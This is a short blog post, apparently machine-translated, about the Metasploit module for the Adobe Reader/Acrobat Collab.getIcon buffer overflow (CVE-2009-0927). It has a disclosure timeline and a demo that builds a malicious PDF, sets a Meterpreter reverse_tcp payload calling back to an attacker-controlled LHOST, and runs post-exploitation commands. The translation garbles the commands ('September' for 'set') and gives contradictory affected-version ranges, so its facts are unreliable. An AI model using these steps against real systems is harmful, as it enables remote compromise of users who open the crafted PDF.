Blog: Twitter twitter.com eromang.zataz.com Timeline: Vulnerability reported by ZDI at Tenable Network Security Vulnerability reported by ZDI, the seller provides for the release of the Metasploit coordinated advice 03/07/2008 03/24/2009 PoC by HD Moore, the PoC provided by milw0rm 28/03/2009 04/05/2009 Abysssec the PoC provided by: MC Didier Stevens jduck Reference (s): CVE-affected 2009-0927 versions of Adobe Reader and Adobe Acrobat Professional 9.0.0 Adobe Reader and Adobe Acrobat Professionaltested prior to version 8.1.4 of the Adobe Reader and Adobe Acrobat Professional versions prior to 7.1.1 on Windows XP SP3 with Adobe Reader 9.0.0 Description: This module uses a buffer overflow in Adobe Reader and Adobe Acrobat. This affects versions prior to 7.1.1 before 8.1.3, and above 9.1. Through a specially crafted PDF that faulty Collab.getIcon () call and which may be an attacker is able to execute arbitrary code. Metasploit Demo: UsingExploit / windows / File / OutputPath September adobe_geticon / home / set eromang Windows LOAD / meterpreter / reverse_tcp September Lhost exploited using 192.168.178.21 / Multi / window manager LOAD / take meterpreter / reverse_tcp September Lhost 192.168.178.21 meetings-ji a sysinfo getuid ipconfig possession!
Tags: metasploit, windows, microsoft, adobe, reader, acrobat, hack
No comments:
Post a Comment